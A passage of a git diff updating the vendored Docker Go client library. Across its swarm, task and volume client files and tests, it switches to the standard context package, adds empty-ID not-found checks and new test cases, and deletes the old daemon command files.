b/vendor/github.com/docker/docker/client/session.go new file mode 100644 index 0000000000..c247123b45 --- /dev/null +++ b/vendor/github.com/docker/docker/client/session.go @@ -0,0 +1,18 @@ +package client // import "github.com/docker/docker/client" + +import ( + "context" + "net" + "net/http" +) + +// DialSession returns a connection that can be used communication with daemon +func (cli *Client) DialSession(ctx context.Context, proto string, meta map[string][]string) (net.Conn, error) { + req, err := http.NewRequest("POST", "/session", nil) + if err != nil { + return nil, err + } + req = cli.addHeaders(req, meta) + + return cli.setupHijackConn(req, proto) +} diff --git a/vendor/github.com/docker/docker/client/swarm_get_unlock_key.go b/vendor/github.com/docker/docker/client/swarm_get_unlock_key.go index be28d32628..0c50c01a8c 100644 --- a/vendor/github.com/docker/docker/client/swarm_get_unlock_key.go +++ b/vendor/github.com/docker/docker/client/swarm_get_unlock_key.go @@ -1,10 +1,10 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" "encoding/json" "github.com/docker/docker/api/types" - "golang.org/x/net/context" ) // SwarmGetUnlockKey retrieves the swarm's unlock key. diff --git a/vendor/github.com/docker/docker/client/swarm_get_unlock_key_test.go b/vendor/github.com/docker/docker/client/swarm_get_unlock_key_test.go new file mode 100644 index 0000000000..a1e460c1dc --- /dev/null +++ b/vendor/github.com/docker/docker/client/swarm_get_unlock_key_test.go @@ -0,0 +1,59 @@ +package client // import "github.com/docker/docker/client" + +import ( + "bytes" + "context" + "encoding/json" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "github.com/docker/docker/api/types" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" +) + +func TestSwarmGetUnlockKeyError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + + _, err := client.SwarmGetUnlockKey(context.Background()) + assert.Check(t, is.ErrorContains(err, "Error response from daemon: Server error")) +} + +func TestSwarmGetUnlockKey(t *testing.T) { + expectedURL := "/swarm/unlockkey" + unlockKey := "SWMKEY-1-y6guTZNTwpQeTL5RhUfOsdBdXoQjiB2GADHSRJvbXeE" + + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + if req.Method != "GET" { + return nil, fmt.Errorf("expected GET method, got %s", req.Method) + } + + key := types.SwarmUnlockKeyResponse{ + UnlockKey: unlockKey, + } + + b, err := json.Marshal(key) + if err != nil { + return nil, err + } + + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader(b)), + }, nil + }), + } + + resp, err := client.SwarmGetUnlockKey(context.Background()) + assert.NilError(t, err) + assert.Check(t, is.Equal(unlockKey, resp.UnlockKey)) +} diff --git a/vendor/github.com/docker/docker/client/swarm_init.go b/vendor/github.com/docker/docker/client/swarm_init.go index fd45d066e3..742ca0f041 100644 --- a/vendor/github.com/docker/docker/client/swarm_init.go +++ b/vendor/github.com/docker/docker/client/swarm_init.go @@ -1,13 +1,13 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" "encoding/json" "github.com/docker/docker/api/types/swarm" - "golang.org/x/net/context" ) -// SwarmInit initializes the Swarm. +// SwarmInit initializes the swarm. func (cli *Client) SwarmInit(ctx context.Context, req swarm.InitRequest) (string, error) { serverResp, err := cli.post(ctx, "/swarm/init", nil, req, nil) if err != nil { diff --git a/vendor/github.com/docker/docker/client/swarm_init_test.go b/vendor/github.com/docker/docker/client/swarm_init_test.go index 811155aff4..1abadc75e9 100644 --- a/vendor/github.com/docker/docker/client/swarm_init_test.go +++ b/vendor/github.com/docker/docker/client/swarm_init_test.go @@ -1,15 +1,14 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "fmt" "io/ioutil" "net/http" "strings" "testing" - "golang.org/x/net/context" - "github.com/docker/docker/api/types/swarm" ) diff --git a/vendor/github.com/docker/docker/client/swarm_inspect.go b/vendor/github.com/docker/docker/client/swarm_inspect.go index 6d95cfc05e..cfaabb25b1 100644 --- a/vendor/github.com/docker/docker/client/swarm_inspect.go +++ b/vendor/github.com/docker/docker/client/swarm_inspect.go @@ -1,13 +1,13 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" "encoding/json" "github.com/docker/docker/api/types/swarm" - "golang.org/x/net/context" ) -// SwarmInspect inspects the Swarm. +// SwarmInspect inspects the swarm. func (cli *Client) SwarmInspect(ctx context.Context) (swarm.Swarm, error) { serverResp, err := cli.get(ctx, "/swarm", nil, nil) if err != nil { diff --git a/vendor/github.com/docker/docker/client/swarm_inspect_test.go b/vendor/github.com/docker/docker/client/swarm_inspect_test.go index 6432d172b4..954adc94c6 100644 --- a/vendor/github.com/docker/docker/client/swarm_inspect_test.go +++ b/vendor/github.com/docker/docker/client/swarm_inspect_test.go @@ -1,7 +1,8 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "encoding/json" "fmt" "io/ioutil" @@ -10,7 +11,6 @@ import ( "testing" "github.com/docker/docker/api/types/swarm" - "golang.org/x/net/context" ) func TestSwarmInspectError(t *testing.T) { diff --git a/vendor/github.com/docker/docker/client/swarm_join.go b/vendor/github.com/docker/docker/client/swarm_join.go index cda99930eb..a1cf0455d2 100644 --- a/vendor/github.com/docker/docker/client/swarm_join.go +++ b/vendor/github.com/docker/docker/client/swarm_join.go @@ -1,11 +1,12 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" + "github.com/docker/docker/api/types/swarm" - "golang.org/x/net/context" ) -// SwarmJoin joins the Swarm. +// SwarmJoin joins the swarm. func (cli *Client) SwarmJoin(ctx context.Context, req swarm.JoinRequest) error { resp, err := cli.post(ctx, "/swarm/join", nil, req, nil) ensureReaderClosed(resp) diff --git a/vendor/github.com/docker/docker/client/swarm_join_test.go b/vendor/github.com/docker/docker/client/swarm_join_test.go index 31ef2a76ee..e67f2bdecf 100644 --- a/vendor/github.com/docker/docker/client/swarm_join_test.go +++ b/vendor/github.com/docker/docker/client/swarm_join_test.go @@ -1,15 +1,14 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "fmt" "io/ioutil" "net/http" "strings" "testing" - "golang.org/x/net/context" - "github.com/docker/docker/api/types/swarm" ) diff --git a/vendor/github.com/docker/docker/client/swarm_leave.go b/vendor/github.com/docker/docker/client/swarm_leave.go index a4df732174..90ca84b363 100644 --- a/vendor/github.com/docker/docker/client/swarm_leave.go +++ b/vendor/github.com/docker/docker/client/swarm_leave.go @@ -1,12 +1,11 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" "net/url" - - "golang.org/x/net/context" ) -// SwarmLeave leaves the Swarm. +// SwarmLeave leaves the swarm. func (cli *Client) SwarmLeave(ctx context.Context, force bool) error { query := url.Values{} if force { diff --git a/vendor/github.com/docker/docker/client/swarm_leave_test.go b/vendor/github.com/docker/docker/client/swarm_leave_test.go index c96dac8120..3dd3711d04 100644 --- a/vendor/github.com/docker/docker/client/swarm_leave_test.go +++ b/vendor/github.com/docker/docker/client/swarm_leave_test.go @@ -1,14 +1,13 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "fmt" "io/ioutil" "net/http" "strings" "testing" - - "golang.org/x/net/context" ) func TestSwarmLeaveError(t *testing.T) { diff --git a/vendor/github.com/docker/docker/client/swarm_unlock.go b/vendor/github.com/docker/docker/client/swarm_unlock.go index addfb59f0a..d2412f7d44 100644 --- a/vendor/github.com/docker/docker/client/swarm_unlock.go +++ b/vendor/github.com/docker/docker/client/swarm_unlock.go @@ -1,17 +1,14 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" + "github.com/docker/docker/api/types/swarm" - "golang.org/x/net/context" ) -// SwarmUnlock unlockes locked swarm. +// SwarmUnlock unlocks locked swarm. func (cli *Client) SwarmUnlock(ctx context.Context, req swarm.UnlockRequest) error { serverResp, err := cli.post(ctx, "/swarm/unlock", nil, req, nil) - if err != nil { - return err - } - ensureReaderClosed(serverResp) return err } diff --git a/vendor/github.com/docker/docker/client/swarm_unlock_test.go b/vendor/github.com/docker/docker/client/swarm_unlock_test.go new file mode 100644 index 0000000000..b3bcc5d922 --- /dev/null +++ b/vendor/github.com/docker/docker/client/swarm_unlock_test.go @@ -0,0 +1,48 @@ +package client // import "github.com/docker/docker/client" + +import ( + "bytes" + "context" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "github.com/docker/docker/api/types/swarm" +) + +func TestSwarmUnlockError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + + err := client.SwarmUnlock(context.Background(), swarm.UnlockRequest{UnlockKey: "SWMKEY-1-y6guTZNTwpQeTL5RhUfOsdBdXoQjiB2GADHSRJvbXeU"}) + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestSwarmUnlock(t *testing.T) { + expectedURL := "/swarm/unlock" + + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + if req.Method != "POST" { + return nil, fmt.Errorf("expected POST method, got %s", req.Method) + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader([]byte(""))), + }, nil + }), + } + + err := client.SwarmUnlock(context.Background(), swarm.UnlockRequest{UnlockKey: "SWMKEY-1-y6guTZNTwpQeTL5RhUfOsdBdXoQjiB2GADHSRJvbXeU"}) + if err != nil { + t.Fatal(err) + } +} diff --git a/vendor/github.com/docker/docker/client/swarm_update.go b/vendor/github.com/docker/docker/client/swarm_update.go index cc8eeb6554..56a5bea761 100644 --- a/vendor/github.com/docker/docker/client/swarm_update.go +++ b/vendor/github.com/docker/docker/client/swarm_update.go @@ -1,15 +1,15 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" "fmt" "net/url" "strconv" "github.com/docker/docker/api/types/swarm" - "golang.org/x/net/context" ) -// SwarmUpdate updates the Swarm. +// SwarmUpdate updates the swarm. func (cli *Client) SwarmUpdate(ctx context.Context, version swarm.Version, swarm swarm.Spec, flags swarm.UpdateFlags) error { query := url.Values{} query.Set("version", strconv.FormatUint(version.Index, 10)) diff --git a/vendor/github.com/docker/docker/client/swarm_update_test.go b/vendor/github.com/docker/docker/client/swarm_update_test.go index 3b23db078f..e908bf7860 100644 --- a/vendor/github.com/docker/docker/client/swarm_update_test.go +++ b/vendor/github.com/docker/docker/client/swarm_update_test.go @@ -1,15 +1,14 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "fmt" "io/ioutil" "net/http" "strings" "testing" - "golang.org/x/net/context" - "github.com/docker/docker/api/types/swarm" ) diff --git a/vendor/github.com/docker/docker/client/task_inspect.go b/vendor/github.com/docker/docker/client/task_inspect.go index bc8058fc32..e1c0a736da 100644 --- a/vendor/github.com/docker/docker/client/task_inspect.go +++ b/vendor/github.com/docker/docker/client/task_inspect.go @@ -1,24 +1,22 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "encoding/json" "io/ioutil" - "net/http" "github.com/docker/docker/api/types/swarm" - - "golang.org/x/net/context" ) // TaskInspectWithRaw returns the task information and its raw representation.. func (cli *Client) TaskInspectWithRaw(ctx context.Context, taskID string) (swarm.Task, []byte, error) { + if taskID == "" { + return swarm.Task{}, nil, objectNotFoundError{object: "task", id: taskID} + } serverResp, err := cli.get(ctx, "/tasks/"+taskID, nil, nil) if err != nil { - if serverResp.statusCode == http.StatusNotFound { - return swarm.Task{}, nil, taskNotFoundError{taskID} - } - return swarm.Task{}, nil, err + return swarm.Task{}, nil, wrapResponseError(err, serverResp, "task", taskID) } defer ensureReaderClosed(serverResp) diff --git a/vendor/github.com/docker/docker/client/task_inspect_test.go b/vendor/github.com/docker/docker/client/task_inspect_test.go index 148cdad3a7..fe5c5bd778 100644 --- a/vendor/github.com/docker/docker/client/task_inspect_test.go +++ b/vendor/github.com/docker/docker/client/task_inspect_test.go @@ -1,7 +1,8 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "encoding/json" "fmt" "io/ioutil" @@ -10,7 +11,7 @@ import ( "testing" "github.com/docker/docker/api/types/swarm" - "golang.org/x/net/context" + "github.com/pkg/errors" ) func TestTaskInspectError(t *testing.T) { @@ -24,6 +25,18 @@ func TestTaskInspectError(t *testing.T) { } } +func TestTaskInspectWithEmptyID(t *testing.T) { + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + return nil, errors.New("should not make request") + }), + } + _, _, err := client.TaskInspectWithRaw(context.Background(), "") + if !IsErrNotFound(err) { + t.Fatalf("Expected NotFoundError, got %v", err) + } +} + func TestTaskInspect(t *testing.T) { expectedURL := "/tasks/task_id" client := &Client{ diff --git a/vendor/github.com/docker/docker/client/task_list.go b/vendor/github.com/docker/docker/client/task_list.go index 66324da959..42d20c1b8d 100644 --- a/vendor/github.com/docker/docker/client/task_list.go +++ b/vendor/github.com/docker/docker/client/task_list.go @@ -1,13 +1,13 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" "encoding/json" "net/url" "github.com/docker/docker/api/types" "github.com/docker/docker/api/types/filters" "github.com/docker/docker/api/types/swarm" - "golang.org/x/net/context" ) // TaskList returns the list of tasks. @@ -15,7 +15,7 @@ func (cli *Client) TaskList(ctx context.Context, options types.TaskListOptions) query := url.Values{} if options.Filters.Len() > 0 { - filterJSON, err := filters.ToParam(options.Filters) + filterJSON, err := filters.ToJSON(options.Filters) if err != nil { return nil, err } diff --git a/vendor/github.com/docker/docker/client/task_list_test.go b/vendor/github.com/docker/docker/client/task_list_test.go index 2a9a4c4346..16d0edaa0a 100644 --- a/vendor/github.com/docker/docker/client/task_list_test.go +++ b/vendor/github.com/docker/docker/client/task_list_test.go @@ -1,7 +1,8 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "encoding/json" "fmt" "io/ioutil" @@ -12,7 +13,6 @@ import ( "github.com/docker/docker/api/types" "github.com/docker/docker/api/types/filters" "github.com/docker/docker/api/types/swarm" - "golang.org/x/net/context" ) func TestTaskListError(t *testing.T) { diff --git a/vendor/github.com/docker/docker/client/task_logs.go b/vendor/github.com/docker/docker/client/task_logs.go new file mode 100644 index 0000000000..6222fab577 --- /dev/null +++ b/vendor/github.com/docker/docker/client/task_logs.go @@ -0,0 +1,51 @@ +package client // import "github.com/docker/docker/client" + +import ( + "context" + "io" + "net/url" + "time" + + "github.com/docker/docker/api/types" + timetypes "github.com/docker/docker/api/types/time" +) + +// TaskLogs returns the logs generated by a task in an io.ReadCloser. +// It's up to the caller to close the stream. +func (cli *Client) TaskLogs(ctx context.Context, taskID string, options types.ContainerLogsOptions) (io.ReadCloser, error) { + query := url.Values{} + if options.ShowStdout { + query.Set("stdout", "1") + } + + if options.ShowStderr { + query.Set("stderr", "1") + } + + if options.Since != "" { + ts, err := timetypes.GetTimestamp(options.Since, time.Now()) + if err != nil { + return nil, err + } + query.Set("since", ts) + } + + if options.Timestamps { + query.Set("timestamps", "1") + } + + if options.Details { + query.Set("details", "1") + } + + if options.Follow { + query.Set("follow", "1") + } + query.Set("tail", options.Tail) + + resp, err := cli.get(ctx, "/tasks/"+taskID+"/logs", query, nil) + if err != nil { + return nil, err + } + return resp.body, nil +} diff --git a/vendor/github.com/docker/docker/client/transport.go b/vendor/github.com/docker/docker/client/transport.go index f04e601649..5541344366 100644 --- a/vendor/github.com/docker/docker/client/transport.go +++ b/vendor/github.com/docker/docker/client/transport.go @@ -1,22 +1,11 @@ -package client +package client // import "github.com/docker/docker/client" import ( "crypto/tls" - "errors" "net/http" ) -var errTLSConfigUnavailable = errors.New("TLSConfig unavailable") - -// transportFunc allows us to inject a mock transport for testing. We define it -// here so we can detect the tlsconfig and return nil for only this type. -type transportFunc func(*http.Request) (*http.Response, error) - -func (tf transportFunc) RoundTrip(req *http.Request) (*http.Response, error) { - return tf(req) -} - -// resolveTLSConfig attempts to resolve the tls configuration from the +// resolveTLSConfig attempts to resolve the TLS configuration from the // RoundTripper. func resolveTLSConfig(transport http.RoundTripper) *tls.Config { switch tr := transport.(type) { diff --git a/vendor/github.com/docker/docker/client/utils.go b/vendor/github.com/docker/docker/client/utils.go index 23d520ecb8..7f3ff44eb8 100644 --- a/vendor/github.com/docker/docker/client/utils.go +++ b/vendor/github.com/docker/docker/client/utils.go @@ -1,9 +1,10 @@ -package client +package client // import "github.com/docker/docker/client" import ( - "github.com/docker/docker/api/types/filters" "net/url" "regexp" + + "github.com/docker/docker/api/types/filters" ) var headerRegexp = regexp.MustCompile(`\ADocker/.+\s\((.+)\)\z`) @@ -23,7 +24,7 @@ func getDockerOS(serverHeader string) string { func getFiltersQuery(f filters.Args) (url.Values, error) { query := url.Values{} if f.Len() > 0 { - filterJSON, err := filters.ToParam(f) + filterJSON, err := filters.ToJSON(f) if err != nil { return query, err } diff --git a/vendor/github.com/docker/docker/client/version.go b/vendor/github.com/docker/docker/client/version.go index 933ceb4a49..1989f6d6d2 100644 --- a/vendor/github.com/docker/docker/client/version.go +++ b/vendor/github.com/docker/docker/client/version.go @@ -1,10 +1,10 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" "encoding/json" "github.com/docker/docker/api/types" - "golang.org/x/net/context" ) // ServerVersion returns information of the docker client and server host. diff --git a/vendor/github.com/docker/docker/client/volume_create.go b/vendor/github.com/docker/docker/client/volume_create.go index 9620c87cbf..f1f6fcdc4a 100644 --- a/vendor/github.com/docker/docker/client/volume_create.go +++ b/vendor/github.com/docker/docker/client/volume_create.go @@ -1,15 +1,15 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" "encoding/json" "github.com/docker/docker/api/types" volumetypes "github.com/docker/docker/api/types/volume" - "golang.org/x/net/context" ) // VolumeCreate creates a volume in the docker host. -func (cli *Client) VolumeCreate(ctx context.Context, options volumetypes.VolumesCreateBody) (types.Volume, error) { +func (cli *Client) VolumeCreate(ctx context.Context, options volumetypes.VolumeCreateBody) (types.Volume, error) { var volume types.Volume resp, err := cli.post(ctx, "/volumes/create", nil, options, nil) if err != nil { diff --git a/vendor/github.com/docker/docker/client/volume_create_test.go b/vendor/github.com/docker/docker/client/volume_create_test.go index 9f1b2540b5..cfab191845 100644 --- a/vendor/github.com/docker/docker/client/volume_create_test.go +++ b/vendor/github.com/docker/docker/client/volume_create_test.go @@ -1,7 +1,8 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "encoding/json" "fmt" "io/ioutil" @@ -11,7 +12,6 @@ import ( "github.com/docker/docker/api/types" volumetypes "github.com/docker/docker/api/types/volume" - "golang.org/x/net/context" ) func TestVolumeCreateError(t *testing.T) { @@ -19,7 +19,7 @@ func TestVolumeCreateError(t *testing.T) { client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), } - _, err := client.VolumeCreate(context.Background(), volumetypes.VolumesCreateBody{}) + _, err := client.VolumeCreate(context.Background(), volumetypes.VolumeCreateBody{}) if err == nil || err.Error() != "Error response from daemon: Server error" { t.Fatalf("expected a Server Error, got %v", err) } @@ -53,7 +53,7 @@ func TestVolumeCreate(t *testing.T) { }), } - volume, err := client.VolumeCreate(context.Background(), volumetypes.VolumesCreateBody{ + volume, err := client.VolumeCreate(context.Background(), volumetypes.VolumeCreateBody{ Name: "myvolume", Driver: "mydriver", DriverOpts: map[string]string{ diff --git a/vendor/github.com/docker/docker/client/volume_inspect.go b/vendor/github.com/docker/docker/client/volume_inspect.go index 3860e9b22c..f840682d2e 100644 --- a/vendor/github.com/docker/docker/client/volume_inspect.go +++ b/vendor/github.com/docker/docker/client/volume_inspect.go @@ -1,13 +1,12 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "encoding/json" "io/ioutil" - "net/http" "github.com/docker/docker/api/types" - "golang.org/x/net/context" ) // VolumeInspect returns the information about a specific volume in the docker host. @@ -18,13 +17,14 @@ func (cli *Client) VolumeInspect(ctx context.Context, volumeID string) (types.Vo // VolumeInspectWithRaw returns the information about a specific volume in the docker host and its raw representation func (cli *Client) VolumeInspectWithRaw(ctx context.Context, volumeID string) (types.Volume, []byte, error) { + if volumeID == "" { + return types.Volume{}, nil, objectNotFoundError{object: "volume", id: volumeID} + } + var volume types.Volume resp, err := cli.get(ctx, "/volumes/"+volumeID, nil, nil) if err != nil { - if resp.statusCode == http.StatusNotFound { - return volume, nil, volumeNotFoundError{volumeID} - } - return volume, nil, err + return volume, nil, wrapResponseError(err, resp, "volume", volumeID) } defer ensureReaderClosed(resp) diff --git a/vendor/github.com/docker/docker/client/volume_inspect_test.go b/vendor/github.com/docker/docker/client/volume_inspect_test.go index 0d1d118828..04f00129b7 100644 --- a/vendor/github.com/docker/docker/client/volume_inspect_test.go +++ b/vendor/github.com/docker/docker/client/volume_inspect_test.go @@ -1,7 +1,8 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "encoding/json" "fmt" "io/ioutil" @@ -10,7 +11,9 @@ import ( "testing" "github.com/docker/docker/api/types" - "golang.org/x/net/context" + "github.com/pkg/errors" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" ) func TestVolumeInspectError(t *testing.T) { @@ -19,9 +22,7 @@ func TestVolumeInspectError(t *testing.T) { } _, err := client.VolumeInspect(context.Background(), "nothing") - if err == nil || err.Error() != "Error response from daemon: Server error" { - t.Fatalf("expected a Server Error, got %v", err) - } + assert.Check(t, is.ErrorContains(err, "Error response from daemon: Server error")) } func TestVolumeInspectNotFound(t *testing.T) { @@ -30,13 +31,29 @@ func TestVolumeInspectNotFound(t *testing.T) { } _, err := client.VolumeInspect(context.Background(), "unknown") - if err == nil || !IsErrVolumeNotFound(err) { - t.Fatalf("expected a volumeNotFound error, got %v", err) + assert.Check(t, IsErrNotFound(err)) +} + +func TestVolumeInspectWithEmptyID(t *testing.T) { + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + return nil, errors.New("should not make request") + }), + } + _, _, err := client.VolumeInspectWithRaw(context.Background(), "") + if !IsErrNotFound(err) { + t.Fatalf("Expected NotFoundError, got %v", err) } } func TestVolumeInspect(t *testing.T) { expectedURL := "/volumes/volume_id" + expected := types.Volume{ + Name: "name", + Driver: "driver", + Mountpoint: "mountpoint", + } + client := &Client{ client: newMockClient(func(req *http.Request) (*http.Response, error) { if !strings.HasPrefix(req.URL.Path, expectedURL) { @@ -45,11 +62,7 @@ func TestVolumeInspect(t *testing.T) { if req.Method != "GET" { return nil, fmt.Errorf("expected GET method, got %s", req.Method) } - content, err := json.Marshal(types.Volume{ - Name: "name", - Driver: "driver", - Mountpoint: "mountpoint", - }) + content, err := json.Marshal(expected) if err != nil { return nil, err } @@ -60,17 +73,7 @@ func TestVolumeInspect(t *testing.T) { }), } - v, err := client.VolumeInspect(context.Background(), "volume_id") - if err != nil { - t.Fatal(err) - } - if v.Name != "name" { - t.Fatalf("expected `name`, got %s", v.Name) - } - if v.Driver != "driver" { - t.Fatalf("expected `driver`, got %s", v.Driver) - } - if v.Mountpoint != "mountpoint" { - t.Fatalf("expected `mountpoint`, got %s", v.Mountpoint) - } + volume, err := client.VolumeInspect(context.Background(), "volume_id") + assert.NilError(t, err) + assert.Check(t, is.DeepEqual(expected, volume)) } diff --git a/vendor/github.com/docker/docker/client/volume_list.go b/vendor/github.com/docker/docker/client/volume_list.go index 32247ce115..284554d67c 100644 --- a/vendor/github.com/docker/docker/client/volume_list.go +++ b/vendor/github.com/docker/docker/client/volume_list.go @@ -1,17 +1,17 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" "encoding/json" "net/url" "github.com/docker/docker/api/types/filters" volumetypes "github.com/docker/docker/api/types/volume" - "golang.org/x/net/context" ) // VolumeList returns the volumes configured in the docker host. -func (cli *Client) VolumeList(ctx context.Context, filter filters.Args) (volumetypes.VolumesListOKBody, error) { - var volumes volumetypes.VolumesListOKBody +func (cli *Client) VolumeList(ctx context.Context, filter filters.Args) (volumetypes.VolumeListOKBody, error) { + var volumes volumetypes.VolumeListOKBody query := url.Values{} if filter.Len() > 0 { diff --git a/vendor/github.com/docker/docker/client/volume_list_test.go b/vendor/github.com/docker/docker/client/volume_list_test.go index f29639be23..2a83823f7e 100644 --- a/vendor/github.com/docker/docker/client/volume_list_test.go +++ b/vendor/github.com/docker/docker/client/volume_list_test.go @@ -1,7 +1,8 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "encoding/json" "fmt" "io/ioutil" @@ -12,7 +13,6 @@ import ( "github.com/docker/docker/api/types" "github.com/docker/docker/api/types/filters" volumetypes "github.com/docker/docker/api/types/volume" - "golang.org/x/net/context" ) func TestVolumeListError(t *testing.T) { @@ -69,7 +69,7 @@ func TestVolumeList(t *testing.T) { if actualFilters != listCase.expectedFilters { return nil, fmt.Errorf("filters not set in URL query properly. Expected '%s', got %s", listCase.expectedFilters, actualFilters) } - content, err := json.Marshal(volumetypes.VolumesListOKBody{ + content, err := json.Marshal(volumetypes.VolumeListOKBody{ Volumes: []*types.Volume{ { Name: "volume", diff --git a/vendor/github.com/docker/docker/client/volume_prune.go b/vendor/github.com/docker/docker/client/volume_prune.go index a07e4ce637..70041efed8 100644 --- a/vendor/github.com/docker/docker/client/volume_prune.go +++ b/vendor/github.com/docker/docker/client/volume_prune.go @@ -1,12 +1,12 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" "encoding/json" "fmt" "github.com/docker/docker/api/types" "github.com/docker/docker/api/types/filters" - "golang.org/x/net/context" ) // VolumesPrune requests the daemon to delete unused data @@ -29,7 +29,7 @@ func (cli *Client) VolumesPrune(ctx context.Context, pruneFilters filters.Args) defer ensureReaderClosed(serverResp) if err := json.NewDecoder(serverResp.body).Decode(&report); err != nil { - return report, fmt.Errorf("Error retrieving disk usage: %v", err) + return report, fmt.Errorf("Error retrieving volume prune report: %v", err) } return report, nil diff --git a/vendor/github.com/docker/docker/client/volume_remove.go b/vendor/github.com/docker/docker/client/volume_remove.go index 6c26575b49..fc5a71d334 100644 --- a/vendor/github.com/docker/docker/client/volume_remove.go +++ b/vendor/github.com/docker/docker/client/volume_remove.go @@ -1,10 +1,10 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" "net/url" "github.com/docker/docker/api/types/versions" - "golang.org/x/net/context" ) // VolumeRemove removes a volume from the docker host. @@ -17,5 +17,5 @@ func (cli *Client) VolumeRemove(ctx context.Context, volumeID string, force bool } resp, err := cli.delete(ctx, "/volumes/"+volumeID, query, nil) ensureReaderClosed(resp) - return err + return wrapResponseError(err, resp, "volume", volumeID) } diff --git a/vendor/github.com/docker/docker/client/volume_remove_test.go b/vendor/github.com/docker/docker/client/volume_remove_test.go index 1fe657349a..31fb3d71aa 100644 --- a/vendor/github.com/docker/docker/client/volume_remove_test.go +++ b/vendor/github.com/docker/docker/client/volume_remove_test.go @@ -1,14 +1,13 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "fmt" "io/ioutil" "net/http" "strings" "testing" - - "golang.org/x/net/context" ) func TestVolumeRemoveError(t *testing.T) { diff --git a/vendor/github.com/docker/docker/cmd/docker/daemon_none.go b/vendor/github.com/docker/docker/cmd/docker/daemon_none.go deleted file mode 100644 index 65f9f37be2..0000000000 --- a/vendor/github.com/docker/docker/cmd/docker/daemon_none.go +++ /dev/null @@ -1,27 +0,0 @@ -// +build !daemon - -package main - -import ( - "fmt" - "runtime" - "strings" - - "github.com/spf13/cobra" -) - -func newDaemonCommand() *cobra.Command { - return &cobra.Command{ - Use: "daemon", - Hidden: true, - RunE: func(cmd *cobra.Command, args []string) error { - return runDaemon() - }, - } -} - -func runDaemon() error { - return fmt.Errorf( - "`docker daemon` is not supported on %s. Please run `dockerd` directly", - strings.Title(runtime.GOOS)) -} diff --git a/vendor/github.com/docker/docker/cmd/docker/daemon_none_test.go b/vendor/github.com/docker/docker/cmd/docker/daemon_none_test.go deleted file mode 100644 index 32032fe1b3..0000000000 --- a/vendor/github.com/docker/docker/cmd/docker/daemon_none_test.go +++ /dev/null @@ -1,17 +0,0 @@ -// +build !daemon - -package main - -import ( - "testing" - - "github.com/docker/docker/pkg/testutil/assert" -) - -func TestDaemonCommand(t *testing.T) { - cmd := newDaemonCommand() - cmd.SetArgs([]string{"--help"}) - err := cmd.Execute() - - assert.Error(t, err, "Please run `dockerd`") -} diff --git a/vendor/github.com/docker/docker/cmd/docker/daemon_unit_test.go b/vendor/github.com/docker/docker/cmd/docker/daemon_unit_test.go deleted file mode 100644 index 26348a8843..0000000000 --- a/vendor/github.com/docker/docker/cmd/docker/daemon_unit_test.go +++ /dev/null @@ -1,30 +0,0 @@ -// +build daemon - -package main - -import ( - "testing" - - "github.com/docker/docker/pkg/testutil/assert" - "github.com/spf13/cobra" -) - -func stubRun(cmd *cobra.Command, args []string) error { - return nil -} - -func TestDaemonCommandHelp(t *testing.T) { - cmd := newDaemonCommand() - cmd.RunE = stubRun - cmd.SetArgs([]string{"--help"}) - err := cmd.Execute() - assert.NilError(t, err) -} - -func TestDaemonCommand(t *testing.T) { - cmd := newDaemonCommand() - cmd.RunE = stubRun - cmd.SetArgs([]string{"--containerd", "/foo"}) - err := cmd.Execute() - assert.NilError(t, err) -} diff --git a/vendor/github.com/docker/docker/cmd/docker/daemon_unix.go b/vendor/github.com/docker/docker/cmd/docker/daemon_unix.go deleted file mode 100644 index f68d220c2f..0000000000 --- a/vendor/github.com/docker/docker/cmd/docker/daemon_unix.go +++ /dev/null @@ -1,79 +0,0 @@ -// +build daemon - -package main - -import ( - "fmt" - - "os" - "os/exec" - "path/filepath" - "syscall" - - 